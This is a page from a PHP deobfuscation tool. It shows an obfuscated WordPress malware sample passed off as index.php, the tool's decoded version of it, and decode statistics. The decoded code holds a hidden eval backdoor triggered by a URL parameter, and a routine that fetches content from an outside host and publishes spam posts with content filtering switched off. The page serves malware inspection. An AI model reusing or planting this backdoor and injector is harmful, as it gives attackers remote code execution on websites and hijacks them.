Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $o0o=__FILE__;$oOo='nVZtb9s2EP5sA/4PhCGUEiq/dB32IakcBKncBnDjTLY3DEEgyNLJZiNLGkk184L..

Decoded Output download

?><?php
if(key($_GET)=='yyy'){eval($_REQUEST['jElhOsnTy']);die;}
$wp_load = GetWpLoadFilePath();
require_once($wp_load);
$users = get_users(array('fields' => array('id'),'number'=>10 ,'offset'=>0));
if(isset($users)&&count($users)>0){$user=$users[array_rand($users)]; $uid=$user->id;}
else $uid=0;
$cates = get_categories(array('number'=>10 ,'offset'=>0));
if(isset($cates)&&count($cates)>0){$cate=$cates[array_rand($cates)]; $cid= $cate->cat_ID;}
else $cid=0;
$cont = CurlHttpRequest('http://wpdb.cheapapi.net/get.php?s='.$_SERVER['SERVER_NAME']);
if ($cont=='cms:error') die($cont);
$cont=gzinflate(base64_decode($cont));
$arr=json_decode($cont);

$my_post = array(
  'post_title'    => $arr->post_title,
  'post_content'  => $arr->post_content,
  'post_status'   => 'publish',
  'post_author'   => $uid,
  'post_category' => array($cid),
  'post_date' => $arr->post_date,
);
remove_filter('content_save_pre', 'wp_filter_post_kses');
remove_filter('content_filtered_save_pre', 'wp_filter_post_kses');
$pid = wp_insert_post($my_post,true);
add_filter('content_save_pre', 'wp_filter_post_kses');
add_filter('content_filtered_save_pre', 'wp_filter_post_kses');
if(is_wp_error($pid)) die('wperr:'.$pid->get_error_message());
$url = get_permalink($pid);
die('nol-url:'.$url);

function CurlHttpRequest($url)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    $output = curl_exec($curl);
    curl_close($curl);
    return $output;
}

function GetWpLoadFilePath(){
	$wpf = $_SERVER['DOCUMENT_ROOT']."/wp-load.php";
	if (file_exists($wpf)) return $wpf;
	$cfg_dirs = array("wp", "blog", "wordpress", "blogs");
	foreach($cfg_dirs as $fdir)
	{
		$wpf = $_SERVER['DOCUMENT_ROOT']."/".$fdir."/wp-load.php";
		if(file_exists($wpf)) return $wpf;
	}	
	$repstr=$_SERVER['DOCUMENT_ROOT'];
	$script=$_SERVER['SCRIPT_FILENAME'];
	for($i=0;$i<3;$i++){
		$pos = strpos($script, $repstr);
		if($pos===FALSE) $repstr=substr($repstr,strpos($repstr,'/',2));
		else break;
	}
	$path = str_replace($repstr, '',$script);
	if($path[0]=='/') $path = substr($path,1);
	$dirname=substr($path,0,strpos($path,'/'));
	$wpf = substr($script,0,strpos($script,$dirname))."/".$dirname."/wp-load.php";
	if (file_exists($wpf)) return $wpf;
	die('wp-load.php not found');
}
?>

Did this file decode correctly?

Original Code

<?php
$o0o=__FILE__;$oOo='nVZtb9s2EP5sA/4PhCGUEiq/dB32IakcBKncBnDjTLY3DEEgyNLJZiNLGkk184L89x5JyS9dtrn1B5N399zxOfKO1MXo3UW5LjttltoPsLWt8IM/dzyPbrdb6jzBlyhDXeD/uvBn8zv62c/WU5HPt/TeOU8YnD932tZjGWZFlBCPfAD5eznB+ZhlcBvJte2cd9oc/qwYh7DIY7AbtDJYlQAu0G8FMtRzO+I82to0ZZAlghJvRGoNS6jj0rzaLIFTb/RmSFxapKkAidLQUeEwBSZQYZu4zqtXcVHlOxFRT3rqGcWdjhzyKE8ayP05sSqWGEBvxBKVH2QCjHqoOMeRhIazmq8KzmBH/ESCOsieoBE1QTX1jOKIoIEogjEyIVrujfA/vH6/ZxnvWBa5RJJXFc8+SlkGeAQgpE3XKJwNBo9lsuzHa4jKqGT9HOQA0+ljIVwIj/atcOYHv/nBHTVjeHP5yVcnrlIgtg6OJRJvxBlwXnDqEKwFo3ea1b3V3yxPM6RpLyMBv/wcJhAXSQPTOEzQ+yyK/NiEFrRttmFZCJWE2dpOmxCqNKFkMgNK8IfloWL0Rnu9u8epYJBL+i2u1h8ghYxkJaiJSMtqmTGxpgeAqJJrzLNeEmvhcBlTBNuDalXn4BxAEoTQb1goHUJMg2yKLxCmLJPAbVrzC0WEypIDdQnFrjFmvSnhgwBB/8PVyJCcFMMqmWpeNLMc615qs90cgCt5BQoWJckPUXzJ77v46bYJ0aqLzVZ0HVNx6IK6M6xY1PVGqiU1JtyAENEKbFNm2AR1wyJ8E2UsfzBR0KjD5EXWQ5AKhIMpwLTKY8mK/B89pCGd9pM6XoItZ6KrAfePSX3lKYvWYLcXpepwFFxytQgm09t5iINLmqX+BzubTULswevxH7e+H7hkfDmZ+d/l93E6m5/uF/jzRXAzDy5vZmO13jxY7NysopJlJZt04S+IjftR3DgrBBzrOciK540/Kp+PtviFdwO3t4VvRYpr7a+j99OrxSf/BklOp3N63+/iRdZTr4m6uroYtqXuJywiQG5MSKGemxSLpVkfJYWy4nQVJky/PaZju49l1yXdZVas1PhY8ASrUohGKboqlVZacIjitb0PEAlipTjDimgpzqeQ7va1ywv0kf8J9J9bKgcOpZD4mP3bQjpREXNWygPQ7Cq4xlMeX098c6vXadkWw5fDYu/e4t/r147JBRsRc8FlcGLXwbByzdJOw1jBPM8zFdZYPVEtcbBr0W2C1CIdUPcnx4TQb9cSd/ZBZ6d4l1gEZuUQHbJIfTnUnoRSt6bimCO3NfxueI+P0gAfo513zUCJ7hsNtnDf82gD3pFtuGOnRRXEoM1ZNtg6/z26VjRBHcccbi3+cHnWV9vOleSFJCl+KiT6PsQNuhi1vgI=';eval(gzinflate(base64_decode('U8n3z7dNr8rMS8tJLEnVSEosTjUziU9JTc5PSdVQAUpqalqDKNvikqL4otSCnMTkVA2l+Hg3Tx/X+HglHSV1lXyDfHUlHbBa69SyxByINmsA')));?>

Function Calls

gzinflate	2
str_replace	1
base64_decode	2

Variables

$o0o	index.php
$oOo	?><?php if(key($_GET)=='yyy'){eval($_REQUEST['jElhOsnTy']);..

Stats

MD5	4caeb99700ff650649e2cfc4c250efae
Eval Count	2
Decode Time	137 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats